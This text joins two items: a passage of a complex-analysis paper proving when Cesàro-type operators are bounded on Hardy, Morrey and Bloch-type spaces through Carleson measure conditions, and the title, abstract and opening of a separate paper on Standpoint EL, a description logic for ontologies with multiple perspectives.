\[\lesssim\int_{0}^{1}\frac{(1-|w|)^{\beta}\log^{\gamma}\frac{e}{1 -|w|}}{(1-t)^{q}(1-|w|t)^{s+\beta-q}}d\mu(t)+\int_{0}^{1}\frac{(1-|w|)^{\beta+ \delta-\varepsilon}\log^{\gamma}\frac{e}{1-|w|}}{(1-t)^{q+\delta-\varepsilon} (1-|w|t)^{s+\beta-q}}d\mu(t)\] \[\lesssim 1.\] This gives \((4)\). **Remark 3.2**.: _For \(\gamma\in\mathbb{R}\) and \(0<s<\infty\), we may prove the following result in a same way._ \[\sup_{t\in[0,1)}\frac{\log^{\gamma}\frac{e}{1-t}\mu([t,1))}{(1-t)^{s}}<\infty \Leftrightarrow(3.1)\Leftrightarrow(3.2)\Leftrightarrow(3.3).\] We now present the proofs of Theorems 1.1-Theorem 1.5. _Proof of Theorem 1.1_ (1). If \(\mathcal{C}_{\mu}(H^{p})\subseteq X\), take \[f_{a}(z)=\frac{(1-a)}{(1-az)^{1+\frac{1}{p}}},\ \ 0<a<1.\] Then \(f_{a}\in H^{p}\) for all \(0<p\leq\infty\) and \(\sup_{0<a<1}||f_{a}||_{p}\lesssim 1\). This implies that \[\mathcal{C}_{\mu}(f_{a})\in X\subseteq\mathcal{B}^{\frac{3-\lambda}{2}}.\] It is easy to see that \[\mathcal{C}_{\mu}(f_{a})^{\prime}(z)=\int_{0}^{1}\frac{tf_{a}^{\prime}(tz)}{(1 -tz)}d\mu(t)+\int_{0}^{1}\frac{tf_{a}(tz)}{(1-tz)^{2}}d\mu(t).\] Since \(\mathcal{C}_{\mu}(f_{a})\in X\subseteq\mathcal{B}^{\frac{3-\lambda}{2}}\), it follows from Lemma 2.1 that \[|\mathcal{C}_{\mu}(f_{a})^{\prime}(a)|\lesssim\frac{1}{(1-a)^{\frac{3-\lambda} {2}}},\ \ a\in(0,1).\] Then it follows that, for \(\frac{1}{2}<a<1\), \[\frac{1}{(1-a)^{\frac{3-\lambda}{2}}} \gtrsim\left|\int_{0}^{1}\frac{(1+\frac{1}{p})ta(1-a)}{(1-ta)(1-ta ^{2})^{2+\frac{1}{p}}}d\mu(t)+\int_{0}^{1}\frac{t(1-a)}{(1-ta)^{2}(1-ta^{2})^{ 1+\frac{1}{p}}}d\mu(t)\right|\] \[\gtrsim\int_{a}^{1}\frac{1}{(1-ta^{2})^{2+\frac{1}{p}}}d\mu(t)\] \[\gtrsim\frac{\mu([a,1))}{(1-a)^{2+\frac{1}{p}}}.\] This gives that \[\mu([a,1))\lesssim(1-a)^{\frac{1+\lambda}{2}+\frac{1}{p}}\ \ \mbox{for all}\ \ \frac{1}{2}<a<1.\] This implies that \(\mu\) is a \(\frac{1+\lambda}{2}+\frac{1}{p}\)-Carleson measure. On the other hand, suppose \(\mu\) is a \(\frac{1+\lambda}{2}+\frac{1}{p}\)-Carleson measure. 
Let \(L^{2,\lambda}\subseteq X\subseteq\mathcal{B}^{\frac{3-\lambda}{2}}\), to prove \(\mathcal{C}_{\mu}(H^{p})\subseteq X\) it is sufficient to prove that \(\mathcal{C}_{\mu}:H^{p}\to L^{2,\lambda}\) is bounded. Without loss of generality, we may assume \(f\in H^{p}\) and \(f(0)=0\). By (1.3), we know that \[\mathcal{C}_{\mu}(f)^{\prime}(z)=\int_{0}^{1}\frac{tf^{\prime}(tz)}{(1-tz)}d \mu(t)+\int_{0}^{1}\frac{tf(tz)}{(1-tz)^{2}}d\mu(t),\quad z\in\mathbb{D}.\] Let \[\delta_{p}=\left\{\begin{array}{ll}\frac{1}{p}&0<p<\infty;\\ 0&p=\infty.\end{array}\right.\] It is known that (see e.g. page 36 in [27]) \[|f(z)|\lesssim\frac{||f||_{p}}{(1-|z|)^{\delta_{p}}},\] and hence \[|f^{\prime}(z)|\lesssim\frac{||f||_{p}}{(1-|z|)^{1+\delta_{p}}}.\] It follows that \[|\mathcal{C}_{\mu}(f)^{\prime}(z)| \leq\int_{0}^{1}\frac{|tf^{\prime}(tz)|}{|1-tz|}d\mu(t)+\int_{0}^{ 1}\frac{|tf(tz)|}{|1-tz|^{2}}d\mu(t)\] \[\leq||f||_{p}\int_{0}^{1}\frac{d\mu(t)}{|1-tz|(1-t|z|)^{1+\delta_ {p}}}+||f||_{p}\int_{0}^{1}\frac{d\mu(t)}{(1-t|z|)^{\delta_{p}}|1-tz|^{2}}\] \[\lesssim||f||_{p}\int_{0}^{1}\frac{d\mu(t)}{|1-tz|(1-t|z|)^{1+ \delta_{p}}}. \tag{3.2}\] Since \(0<\lambda<1\), we can choose a positive real number \(1-\lambda<\sigma<1\) such that \[\frac{1}{(1-t|z|)^{2+2\delta_{p}}}\leq\frac{1}{(1-t)^{2+2\delta_{p}-\sigma}(1 -|z|)^{\sigma}}. \tag{3.3}\] By (3.2) and Minkowski's inequality, (3.3), Lemma 2.4 and Proposition 3.1, we get \[||\mathcal{C}_{\mu}(f)||_{L^{2,\lambda}}\asymp\sup_{w\in\mathbb{D}} \left((1-|w|^{2})^{1-\lambda}\int_{\mathbb{D}}|\mathcal{C}_{\mu}(f)^{\prime}(z) |^{2}(1-|\sigma_{w}(z)|^{2})dA(z)\right)^{\frac{1}{2}}\] \[\lesssim||f||_{p}\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2-\lambda }{2}}\left(\int_{\mathbb{D}}\left(\int_{0}^{1}\frac{d\mu(t)}{|1-tz|(1-t|z|)^{1+ \delta_{p}}}\right)^{2}\frac{1-|z|^{2}}{|1-z\overline{w}|^{2}}dA(z)\right)^{ \frac{1}{2}}\] \[\leq||f||_{p}\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2-\lambda}{ 2}}\int_{0}^{1}\left(\int_{\mathbb{D}}\frac{(1-|z|^{2})dA(z)}{(1-t|z|)^{2(1+ \delta_{p})}|1-tz|^{2}|1-z\overline{w}|^{2}}\right)^{\frac{1}{2}}d\mu(t)\] \[\lesssim||f||_{p}\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2- \lambda}{2}}\int_{0}^{1}\frac{1}{(1-t)^{1+\delta_{p}-\frac{\sigma}{2}}}\left( \int_{\mathbb{D}}\frac{(1-|z|)^{1-\sigma}dA(z)}{|1-tz|^{2}|1-z\overline{w}|^{ 2}}\right)^{\frac{1}{2}}d\mu(t)\] \[\asymp||f||_{p}\sup_{w\in\mathbb{D}}\int_{0}^{1}\frac{(1-|w|^{2} )^{\frac{2-\lambda}{2}}}{(1-t)^{1+\delta_{p}-\frac{\sigma}{2}}|1-tw|^{\frac{1 +\sigma}{2}}}d\mu(t)\] \[\lesssim||f||_{p}.\] Therefore, \(\mathcal{C}_{\mu}:H^{p}\to L^{2,\lambda}\) is bounded. The proof is complete. **Corollary 3.3**.: _Suppose \(0<\lambda\leq 1\) and \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Then \(\mathcal{C}_{\mu}:H^{\infty}\to L^{2,\lambda}\) is bounded if and only if \(\mu\) is a \(\frac{1+\lambda}{2}\)-Carleson measure._ **Remark 3.4**.: _If \(\frac{1}{2}<\alpha\leq 1\), then Corollary 3.3 show that \(\mu\) is an \(\alpha\)-Carleson measure if and only if \(\mathcal{C}_{\mu}(H^{\infty})\subseteq L^{2,2\alpha-1}\). 
When \(0<\alpha\leq\frac{1}{2}\) and \(\mu\) is an \(\alpha\)-Carleson measure, by Proposition 3.1 we have_ \[\sup_{z\in\mathbb{D}}(1-|z|^{2})^{2-\alpha}|\mathcal{C}_{\mu}(f)^{ \prime}(z)| \lesssim||f||_{H^{\infty}}\sup_{z\in\mathbb{D}}\int_{0}^{1}\frac{ (1-|z|^{2})^{2-\alpha}d\mu(t)}{(1-t|z|)|1-tz|}\] \[\lesssim||f||_{H^{\infty}}\sup_{z\in\mathbb{D}}\int_{0}^{1}\frac{ (1-|z|^{2})^{1-\alpha}d\mu(t)}{|1-tz|}\] \[\lesssim||f||_{H^{\infty}}.\] _This yields that \(\mathcal{C}_{\mu}(H^{\infty})\subseteq\mathcal{B}^{2-\alpha}\).\(\square\)_ For \(2<p\leq\infty\), it follows from Theorem 9 in [39] that the Cesrao operator \(\mathcal{C}\) is bounded from \(H^{p}\) to \(L^{2,1-\frac{2}{p}}\). As a consequence of Theorem 1.1, we have the following result. **Corollary 3.5**.: _Suppose \(2<p\leq\infty\) and \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Then \(\mathcal{C}_{\mu}:H^{p}\to L^{2,1-\frac{2}{p}}\) is bounded if and only if \(\mu\) is a \(1\)-Carleosn measure._ Proof of Theorem 1.2 (1).: The proof of necessity is similar to that Theorem 1.1 and hence omitted. For the sufficiency, it is suffices to show that \(\mathcal{C}_{\mu}(\mathcal{B}^{1+\frac{1}{p}})\subseteq\Lambda_{\frac{1}{q}}^ {q}\) when \(\mu\) is an \(1+\frac{1}{p}\)-Carleson measure. Notice that (3.2) is remain valid for all \(f\in\mathcal{B}^{1+\frac{1}{p}}\). By (3.2) and the Minkowski inequality, Lemma 2.5 and Proposition 3.1 we have \[\sup_{0<r<1}(1-r)^{1-\frac{1}{q}}\left(\frac{1}{2\pi}\int_{0}^{2 \pi}|\mathcal{C}_{\mu}(f)^{\prime}(re^{i\theta})|^{q}d\theta\right)^{\frac{1}{ q}}\] \[\lesssim \|f\|_{\mathcal{B}^{1+\frac{1}{p}}}\sup_{0<r<1}(1-r)^{1-\frac{1} {q}}\left(\frac{1}{2\pi}\int_{0}^{2\pi}\left(\int_{0}^{1}\frac{d\mu(t)}{|1-tre^ {i\theta}|(1-tr)^{1+\delta_{p}}}\right)^{q}d\theta\right)^{\frac{1}{q}}\] \[\lesssim \|f\|_{\mathcal{B}^{1+\frac{1}{p}}}\sup_{0<r<1}(1-r)^{1-\frac{1} {q}}\int_{0}^{1}\left(\frac{1}{2\pi}\int_{0}^{2\pi}\frac{1}{|1-tre^{i\theta}| ^{q}(1-tr)^{q(1+\delta_{p})}}d\theta\right)^{\frac{1}{q}}d\mu(t)\] \[\lesssim \|f\|_{\mathcal{B}^{1+\frac{1}{p}}}\sup_{0<r<1}\int_{0}^{1}\frac {(1-r)^{1-\frac{1}{q}}}{(1-tr)^{2+\delta_{p}-\frac{1}{q}}}d\mu(t)\] \[\lesssim \|f\|_{\mathcal{B}^{1+\frac{1}{p}}}.\] This gives \(\mathcal{C}_{\mu}:\mathcal{B}^{1+\frac{1}{p}}\to\Lambda_{\frac{1}{q}}^{q}\) is bounded. (2). Suppose \(\mu\) is a \(1\)-logarithmic \(1+\frac{1}{p}\)-Carleson measure. Let \(H^{p}\subseteq X\subseteq\mathcal{B}^{1+\frac{1}{p}}\) and \(f\in X\), then \(f\in X\subseteq\mathcal{B}^{1+\frac{1}{p}}\). Using the integral representation of \(\mathcal{C}_{\mu}\) we see that \[\mathcal{C}_{\mu}(f)^{\prime\prime}(z)=\int_{0}^{1}\frac{t^{2}f^{\prime\prime} (tz)}{1-tz}d\mu(t)+2\int_{0}^{1}\frac{t^{2}f^{\prime}(tz)}{(1-tz)^{2}}d\mu(t)+ 2\int_{0}^{1}\frac{t^{2}f(tz)}{(1-tz)^{3}}d\mu(t). 
\tag{3.4}\] It follows from Lemma 2.1 we have that \[|\mathcal{C}_{\mu}(f)^{\prime\prime}(z)| \lesssim||f||_{\mathcal{B}^{1+\frac{1}{p}}}\int_{0}^{1}\left( \frac{(1-t|z|)^{-2-\frac{1}{p}}}{|1-tz|}+\frac{(1-t|z|)^{-1-\frac{1}{p}}}{|1-tz |^{2}}+\frac{(1-t|z|)^{-\frac{1}{p}}}{|1-tz|^{3}}\right)d\mu(t)\] \[\lesssim||f||_{\mathcal{B}^{1+\frac{1}{p}}}\int_{0}^{1}\frac{1}{ (1-t|z|)^{2+\frac{1}{p}}|1-tz|}d\mu(t).\] By Fubini's theorem, Lemma 2.5 and Proposition 3.1, we have \[\sup_{0\leq r<1}(1-r)M_{1}(\mathcal{C}_{\mu}(f)^{\prime\prime},r)\] \[\lesssim||f||_{\mathcal{B}^{1+\frac{1}{p}}}\sup_{0\leq r<1}(1-r) \int_{0}^{2\pi}\int_{0}^{1}\frac{d\mu(t)}{(1-tr)^{2+\frac{1}{p}}|1-tre^{i\theta }|}d\theta\] \[\lesssim||f||_{\mathcal{B}^{1+\frac{1}{p}}}\sup_{0\leq r<1}\int_{ 0}^{1}\frac{1-r}{(1-tr)^{2+\frac{1}{p}}}\int_{0}^{2\pi}\frac{d\theta}{|1-tre^ {i\theta}|}d\mu(t)\] \[\lesssim||f||_{\mathcal{B}^{1+\frac{1}{p}}}\sup_{0\leq r<1}\int_{ 0}^{1}\frac{(1-r)\log\frac{e}{1-tr}}{(1-tr)^{2+\frac{1}{p}}}d\mu(t)\] \[\lesssim||f||_{\mathcal{B}^{1+\frac{1}{p}}}\lesssim||f||_{X}.\] This gives \(\mathcal{C}_{\mu}:X\to\Lambda_{1}^{1}\) is bounded. Theorem 1.1 and Theorem 1.2 lead to the following result. **Corollary 3.6**.: _Suppose \(0<p\leq\infty\), \(1<q<\infty\) and \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Let \(X\) be a subspace of \(H(\mathbb{D})\) with \(\Lambda^{q}_{\frac{1}{q}}\subseteq X\subseteq\mathcal{B}\). Then \(\mathcal{C}_{\mu}:H^{p}\to X\) is bounded if and only if \(\mu\) is a \(1+\frac{1}{p}\)-Carleson measure._ **Remark 3.7**.: _In [23], Blasco proved that \(\mathcal{C}_{\eta}:H^{1}\to\Lambda^{2}_{\frac{1}{2}}\) is bounded if and only if_ \[\sup_{n\geq 0}(n+1)^{3}\sum_{k=n}^{\infty}|\eta_{k}|^{2}<\infty, \tag{3.5}\] _where \(\eta\) is a complex Borel measure on \([0,1)\). See Theorem 3.7 in [23] for the detailed. If \(\mu\) is a positive Borel measure on \([0,1)\), then Corollary 3.6 shows that \(\mathcal{C}_{\mu}:H^{1}\to\Lambda^{2}_{\frac{1}{2}}\) is bounded if and only if \(\mu\) is a \(2\)-Carleosn measure. The condition (3.5) is equivalent to \(\mu\) is a \(2\)-Carleosn measure when \(\mu\) is a positive Borel measure on \([0,1)\). In fact,_ \[\infty>\sup_{n\geq 0}(n+1)^{3}\sum_{k=n}^{\infty}|\mu_{k}|^{2}\gtrsim\sup_{n \geq 0}(n+1)^{3}\sum_{k=n}^{2n}\mu_{k}^{2}\gtrsim\sup_{n\geq 0}(n+1)^{4}\mu_{2n} ^{2}.\] _On the other hand, if \(\mu\) is a \(2\)-Carleosn measure, we have_ \[\sup_{n\geq 0}(n+1)^{3}\sum_{k=n}^{\infty}|\mu_{k}|^{2} \lesssim\sup_{n\geq 0}(n+1)^{3}\sum_{k=n}^{\infty}\frac{1}{(k+1)^{4}}\] \[\lesssim\sup_{n\geq 0}(n+1)^{3}\int_{n+1}^{\infty}\frac{1}{x^{4}} dx\lesssim 1.\square\] For \(0<\lambda<1\), let \(p=\frac{2}{1-\lambda}\) in Theorem 1.2, then we may obtain the boundedness of \(\mathcal{C}_{\mu}\) acting from \(L^{2,\lambda}\) to the mean Lipschitz space \(\Lambda^{q}_{\frac{1}{q}}\). **Corollary 3.8**.: _Suppose \(0<\lambda<1\), \(1<p<\infty\) and \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Let \(X\) be subspace of \(H(\mathbb{D})\) such that \(\Lambda^{p}_{\frac{1}{p}}\subseteq X\subseteq\mathcal{B}\). Then \(\mathcal{C}_{\mu}:L^{2,\lambda}\to X\) is bounded if and only if \(\mu\) is a \(\frac{3-\lambda}{2}\)-Carleson measure._ Proof of Theorem 1.3\((1)\Rightarrow(2)\).: Let \(\Lambda^{1}_{1}\subseteq X\subseteq\mathcal{B}\) and \(L^{2,\lambda}\subseteq Y\subseteq\mathcal{B}^{\frac{3-\lambda}{2}}\). 
It is easy to check that \(g(z)=\log\frac{1}{1-z}\in X\) and \[\mathcal{C}_{\mu}(g)(z)=\sum_{k=0}^{\infty}\mu_{k}\left(\sum_{n=1}^{k}\frac{1} {n}\right)z^{n}.\] If \(\mathcal{C}_{\mu}(X)\subseteq Y\), then \(\mathcal{C}_{\mu}(g)\in Y\subseteq\mathcal{B}^{\frac{3-\lambda}{2}}\). It follows from Lemma 2.1 that \[\sum_{k=1}^{\infty}k\mu_{k}\left(\sum_{n=1}^{k}\frac{1}{n}\right)r^{n}\lesssim \frac{1}{(1-r)^{\frac{3-\lambda}{2}}},\ \ r\in(0,1).\] For \(K\geq 2\) take \(r_{k}=1-\frac{1}{K}\). Since the sequence \(\{\mu_{k}\}\) is decreasing, simple estimations lead us to the following \[K^{\frac{3-\lambda}{2}} \gtrsim\sum_{k=1}^{\infty}k\mu_{k}\left(\sum_{n=1}^{k}\frac{1}{n} \right)r_{K}^{n}\] \[\gtrsim\sum_{k=1}^{K}k\mu_{k}\left(\sum_{n=1}^{k}\frac{1}{n} \right)r_{K}^{n}\] \[\gtrsim\sum_{k=1}^{K}k\mu_{k}\log kr_{K}^{n}\] \[\gtrsim\mu_{K}\sum_{k=1}^{K}k\log k\] \[\asymp\mu_{K}K^{2}\log K.\] Hence \(\mu_{K}\lesssim\frac{1}{K^{\frac{1+\lambda}{2}}\log K}\) which implies that \(\mu\) is a \(1\)-logarithmic \(\frac{1+\lambda}{2}\)-Carleson measure. \((2)\Rightarrow(1)\). Assume that \(\mu\) is a \(1\)-logarithmic \(\frac{1+\lambda}{2}\)-Carleson measure. It suffices to show that \(\mathcal{C}_{\mu}:\mathcal{B}\to L^{2,\lambda}\) is bounded. Let \(f\in\mathcal{B}\), it is clear that \[|\mathcal{C}_{\mu}(f)^{\prime}(z)| \leq\int_{0}^{1}\frac{|tf^{\prime}(tz)|}{|1-tz|}d\mu(t)+\int_{0} ^{1}\frac{|tf(tz)|}{|1-tz|^{2}}d\mu(t)\] \[\leq||f||_{\mathcal{B}}\int_{0}^{1}\frac{d\mu(t)}{|1-tz|(1-t|z|)} +||f||_{\mathcal{B}}\int_{0}^{1}\frac{\log\frac{e}{1-t|z|}}{|1-tz|^{2}}d\mu(t)\] This gives \[||\mathcal{C}_{\mu}(f)||_{L^{2,\lambda}}\asymp\sup_{w\in\mathbb{ D}}\left((1-|w|^{2})^{1-\lambda}\int_{\mathbb{D}}|\mathcal{C}_{\mu}(f)^{ \prime}(z)|^{2}(1-|\sigma_{w}(z)|^{2})dA(z)\right)^{\frac{1}{2}}\] \[\lesssim||f||_{\mathcal{B}}\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac {2-\lambda}{2}}\left(\int_{\mathbb{D}}\left(\int_{0}^{1}\frac{d\mu(t)}{|1-tz |(1-t|z|)}\right)^{2}\frac{1-|z|^{2}}{|1-z\overline{w}|^{2}}dA(z)\right)^{ \frac{1}{2}}\] \[+||f||_{\mathcal{B}}\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2- \lambda}{2}}\left(\int_{\mathbb{D}}\left(\int_{0}^{1}\frac{\log\frac{e}{1-t|z |}d\mu(t)}{|1-tz|^{2}}\right)^{2}\frac{1-|z|^{2}}{|1-z\overline{w}|^{2}}dA(z) \right)^{\frac{1}{2}}\] \[:=E_{1}+E_{2}.\] Since \(\mu\) is a \(1\)-logarithmic \(\frac{1+\lambda}{2}\)-Carleson measure, by the Minkowski inequality, Lemma 2.4 and Proposition 3.1, we have \[E_{2} :=||f||_{\mathcal{B}}\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2- \lambda}{2}}\left(\int_{\mathbb{D}}\left(\int_{0}^{1}\frac{\log\frac{e}{1-t|z|}d \mu(t)}{|1-tz|^{2}}\right)^{2}\frac{1-|z|^{2}}{|1-z\overline{w}|^{2}}dA(z) \right)^{\frac{1}{2}}\] \[\leq||f||_{\mathcal{B}}\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2- \lambda}{2}}\int_{0}^{1}\left(\int_{\mathbb{D}}\frac{\log^{2}\frac{e}{1-|z|}(1- |z|^{2})dA(z)}{|1-tz|^{4}|1-z\overline{w}|^{2}}\right)^{\frac{1}{2}}d\mu(t)\] \[\asymp||f||_{\mathcal{B}}\sup_{w\in\mathbb{D}}\int_{0}^{1}\frac{(1 -|w|^{2})^{\frac{2-\lambda}{2}}\log\frac{e}{1-t}}{(1-t)^{\frac{1}{2}}|1-t \overline{w}|}d\mu(t)\] \[\leq||f||_{\mathcal{B}}\sup_{w\in\mathbb{D}}\int_{0}^{1}\frac{(1 -|w|^{2})^{\frac{2-\lambda}{2}}\log\frac{e}{1-t}}{(1-t)^{\frac{1}{2}}(1-t|w|) ^{\frac{1+\lambda}{2}+\frac{2-\lambda}{2}-\frac{1}{2}}}d\mu(t)\] \[\lesssim||f||_{\mathcal{B}}.\] Note that \(\mu\) is also a \(\frac{1+\lambda}{2}\)-Carleson measure. 
Arguing as the proof of Theorem 1.1 (the case of \(\delta_{p}=0\)) we may obtain that \[E_{1}:=||f||_{\mathcal{B}}\sup_{w\in\mathbb{D}}(1-|w|^{2})^{\frac{2-\lambda}{2 }}\left(\int_{\mathbb{D}}\left(\int_{0}^{1}\frac{d\mu(t)}{|1-tz|(1-t|z|)} \right)^{2}\frac{1-|z|^{2}}{|1-z\overline{w}|^{2}}dA(z)\right)^{\frac{1}{2}} \lesssim||f||_{\mathcal{B}}.\] Therefore, we deduce that \[||\mathcal{C}_{\mu}(f)||_{L^{2,\lambda}}\lesssim||f||_{\mathcal{B}}.\] The proof is complete. \(\square\) **Corollary 3.9**.: _Suppose \(0<\lambda\leq 1\) and \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Let \(X\) be subspace of \(H(\mathbb{D})\) such that \(\Lambda^{1}_{1}\subseteq X\subseteq\mathcal{B}\). Then \(\mathcal{C}_{\mu}:X\to L^{2,\lambda}\) is bounded if and only if \(\mu\) is a \(1\)-logarithmic\(\frac{1+\lambda}{2}\)-Carleson measure._ _Proof of Theorem 1.4_\((1)\Rightarrow(2)\). Arguing as the proof of Theorem 1.3 we may obtain that \(\mu\) is a \(1\)-logarithmic \(1\)-Carleson measure. \((2)\Rightarrow(1)\). Suppose \(\mu\) is a \(1\)-logarithmic \(1\)-Carleson measure and \(\Lambda^{1}_{1}\subseteq X,Y\subseteq\mathcal{B}\). Note that \(f\in X\subseteq\mathcal{B}\), by (3.5) we have \[|\mathcal{C}_{\mu}(f)^{\prime\prime}(z)| \lesssim||f||_{\mathcal{B}}\int_{0}^{1}\left(\frac{(1-t|z|)^{-2} }{|1-tz|}+\frac{(1-t|z|)^{-1}}{|1-tz|^{2}}+\frac{\log\frac{e}{1-t|z|}}{|1-tz|^ {3}}\right)d\mu(t)\] \[\lesssim||f||_{\mathcal{B}}\left(\int_{0}^{1}\frac{d\mu(t)}{(1-t| z|)^{2}|1-tz|}+\int_{0}^{1}\frac{\log\frac{e}{1-t|z|}d\mu(t)}{|1-tz|^{3}} \right).\] Using (1.2) and Fubini's theorem, Lemma 2.5 and Proposition 3.1, we have \[\sup_{0\leq r<1}(1-r)M_{1}(\mathcal{C}_{\mu}(f)^{\prime\prime},r)\] \[\lesssim||f||_{\mathcal{B}}\sup_{0\leq r<1}(1-r)\int_{0}^{2\pi}\int _{0}^{1}\frac{d\mu(t)}{(1-tr)^{2}|1-tre^{i\theta}|}d\theta\] \[+||f||_{\mathcal{B}}\sup_{0\leq r<1}(1-r)\int_{0}^{2\pi}\int_{0}^ {1}\frac{\log\frac{e}{1-tr}d\mu(t)}{|1-tre^{i\theta}|^{3}}d\theta\] \[\lesssim||f||_{\mathcal{B}}\sup_{0\leq r<1}\int_{0}^{1}\frac{1-r} {(1-tr)^{2}}\int_{0}^{2\pi}\frac{d\theta}{|1-tre^{i\theta}|}d\mu(t)\] \[\quad+||f||_{\mathcal{B}}\sup_{0\leq r<1}\int_{0}^{1}(1-r)\log \frac{e}{1-t}\int_{0}^{2\pi}\frac{d\theta}{|1-tre^{i\theta}|^{3}}d\mu(t)\] \[\lesssim||f||_{\mathcal{B}}\sup_{0\leq r<1}\int_{0}^{1}\frac{(1- r)\log\frac{e}{1-t}}{(1-tr)^{2}}d\mu(t)\] \[\lesssim||f||_{\mathcal{B}}.\] This yields that \(\mathcal{C}_{\mu}(f)\in\Lambda^{1}_{1}\subseteq Y\). \(\square\) Note that the spaces \(\Lambda^{p}_{\frac{1}{p}}\) for \(1\leq p<\infty\), the spaces \(Q_{p}\) for all \(0<p<\infty\) are satisfied the condition in Theorem 1.4. Therefore, we may obtain a number of results. _Proof of Theorem 1.5_ \((1)\Rightarrow(2)\). Let \(f(z)=(1-z)^{-\frac{1-\lambda_{1}}{2}}\), then Lemma 2.6 shows that \(f\in L^{2,\lambda_{1}}\subseteq X\). Note that \(\mathcal{C}_{\mu}(f)\in Y\subseteq\mathcal{B}^{\frac{3-\lambda_{2}}{2}}\) and \[\mathcal{C}_{\mu}(f)(z)=\sum_{k=0}^{\infty}\mu_{k}\left(\sum_{j=0}^{k}\frac{ \Gamma(\frac{1-\lambda_{1}}{2}+j)}{\Gamma(\frac{1-\lambda_{1}}{2})\Gamma(j+1) }\right)z^{k},\] By the Stirling formula, \[\frac{\Gamma(j+\frac{1-\lambda_{1}}{2})}{\Gamma(\frac{1-\lambda_{1}}{2}) \Gamma(j+1)}\asymp(j+1)^{-\frac{1+\lambda_{1}}{2}}\] for all nonnegative integers \(j\). 
This together with \(\{\mu_{k}\}\) is decreasing with \(k\) and Lemma 2.2 we deduce that \[1 \gtrsim n^{-\frac{3-\lambda_{2}}{2}}\sum_{k=1}^{n}k\mu_{k}\left( \sum_{j=0}^{k}\frac{\Gamma(\frac{1-\lambda_{1}}{2}+j)}{\Gamma(\frac{1-\lambda_ {2}}{2})\Gamma(j+1)}\right)\] \[\gtrsim n^{-\frac{3-\lambda_{2}}{2}}\sum_{k=1}^{n}k\mu_{k}\left( \sum_{j=0}^{k}(j+1)^{-\frac{1+\lambda_{1}}{2}}\right)\] \[\gtrsim n^{-\frac{3-\lambda_{2}}{2}}\mu_{n}\sum_{k=1}^{n}k^{\frac {3-\lambda_{1}}{2}}\] \[\gtrsim\mu_{n}n^{1+\frac{\lambda_{2}-\lambda_{1}}{2}}.\] Lemma 2.3 shows that \(\mu\) is a \(1+\frac{\lambda_{2}-\lambda_{1}}{2}\)-Carleson measure. \((2)\Rightarrow(1)\). It suffices to prove that \(\mathcal{C}_{\mu}:\mathcal{B}^{\frac{3-\lambda_{1}}{2}}\to L^{2,\lambda_{2}}\) is bounded. Let \(f\in\mathcal{B}^{\frac{3-\lambda_{2}}{2}}\), then (1.3) and Lemma 2.1 imply that \[|\mathcal{C}_{\mu}(f)^{\prime}(z)|\lesssim||f||_{\frac{3-\lambda_{1}}{2}}\int_ {0}^{1}\frac{d\mu(t)}{(1-t|z|)^{\frac{3-\lambda_{1}}{2}}|1-tz|}.\] Then arguing as the proof of Theorem 1.1 we can get the desired result. The proof is complete. \(\square\) **Corollary 3.10**.: _Suppose \(0<\lambda<1\), \(\mu\) is a finite positive Borel measure on the interval \([0,1)\). Then \(\mathcal{C}_{\mu}\) is a bounded operator on \(L^{2,\lambda}\) if and only if \(\mu\) is a \(1\)-Carleson measure._ ## Data Availability No data were used to support this study. ## Conflicts of Interest The authors declare that there is no conflict of interest. ## Funding The research is support by thee Natural Science Foundation of Hunan Province (No. 2022JJ30369).
2302.13187
Tractable Diversity: Scalable Multiperspective Ontology Management via Standpoint EL
The tractability of the lightweight description logic EL has allowed for the construction of large and widely used ontologies that support semantic interoperability. However, comprehensive domains with a broad user base are often at odds with strong axiomatisations otherwise useful for inferencing, since these are usually context-dependent and subject to diverging perspectives. In this paper we introduce Standpoint EL, a multi-modal extension of EL that allows for the integrated representation of domain knowledge relative to diverse, possibly conflicting standpoints (or contexts), which can be hierarchically organised and put in relation to each other. We establish that Standpoint EL still exhibits EL's favourable PTime standard reasoning, whereas introducing additional features like empty standpoints, rigid roles, and nominals makes standard reasoning tasks intractable.
Lucía Gómez Álvarez, Sebastian Rudolph, Hannes Strass
2023-02-25T22:59:04Z
http://arxiv.org/abs/2302.13187v1
# Tractable Diversity: Scalable Multiperspective Ontology Management via Standpoint \(\mathcal{EL}\)

###### Abstract

The tractability of the lightweight description logic \(\mathcal{EL}\) has allowed for the construction of large and widely used ontologies that support semantic interoperability. However, comprehensive domains with a broad user base are often at odds with strong axiomatisations otherwise useful for inferencing, since these are usually context-dependent and subject to diverging perspectives. In this paper we introduce _Standpoint \(\mathcal{EL}\)_, a multi-modal extension of \(\mathcal{EL}\) that allows for the integrated representation of domain knowledge relative to diverse, possibly conflicting _standpoints_ (or contexts), which can be hierarchically organised and put in relation to each other. We establish that _Standpoint \(\mathcal{EL}\)_ still exhibits \(\mathcal{EL}\)'s favourable PTime standard reasoning, whereas introducing additional features like empty standpoints, rigid roles, and nominals makes standard reasoning tasks intractable.

## 1 Introduction

In many subfields of artificial intelligence, ontologies are used to provide a formal representation of a shared vocabulary, give meaning to its terms, and describe the relations between them. To this end, one of the most prominent and successful classes of logic-based knowledge representation formalisms are _description logics_ (DLs) [1, 1], which provide the formal basis for the most recent version of the Web Ontology Language OWL 2 [1]. Among the most widely used families of DLs today is \(\mathcal{EL}\)[1], which is the formal basis of OWL 2 EL [1], a popular tractable profile of OWL 2. One of the main appeals of \(\mathcal{EL}\) is that basic reasoning tasks can be performed in polynomial time with respect to the size of the ontology, enabling reasoning-supported creation and maintenance of very large ontologies. An example of this is the healthcare ontology SNOMED CT [1], with worldwide adoption and a broad user base comprising clinicians, patients, and researchers. However, when modelling comprehensive ontologies like SNOMED CT, one is usually facing issues related to context- or perspective-dependent knowledge as well as ambiguity of language [1]. For instance, the concept \(\mathtt{Tumour}\) might denote a process or a piece of tissue; \(\mathtt{Allergy}\) may denote an allergic reaction or just an allergic disposition. In a similar vein, the decentralised nature of the Semantic Web has led to the 